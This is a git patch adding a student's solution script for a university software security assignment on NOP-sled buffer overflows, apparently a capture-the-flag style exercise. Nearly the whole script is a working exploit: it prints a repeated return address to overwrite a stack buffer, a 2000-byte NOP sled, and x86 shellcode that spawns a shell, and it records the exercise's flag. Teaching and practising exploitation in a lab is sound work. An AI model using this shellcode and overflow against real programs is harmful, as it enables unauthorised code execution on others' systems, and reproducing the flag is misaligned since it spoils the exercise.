From 8ab148a95f7106091fcfb898797c0a7b1a276e63 Mon Sep 17 00:00:00 2001 From: Sascha Tommasone Date: Sun, 23 Jun 2024 23:00:27 +0200 Subject: [PATCH] [Assignment-6] solution task 6 again (nop sliding) --- .../slide_rider/solution-sascha.sh | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 Assignment 6 - Software Security - Teil 2/slide_rider/solution-sascha.sh diff --git a/Assignment 6 - Software Security - Teil 2/slide_rider/solution-sascha.sh b/Assignment 6 - Software Security - Teil 2/slide_rider/solution-sascha.sh new file mode 100644 index 0000000..80fe801 --- /dev/null +++ b/Assignment 6 - Software Security - Teil 2/slide_rider/solution-sascha.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/ + +# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN} + +######### Exploit ######### +# Step 1: Fill the buffer with a candidate return address +printf "\x0c\xd6\xff\xff%.0s" {1..30} + +# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode +printf "\x90%.0s" {1..2000} + +# Step 3: Write the provided shellcode to stdout +printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" +###########################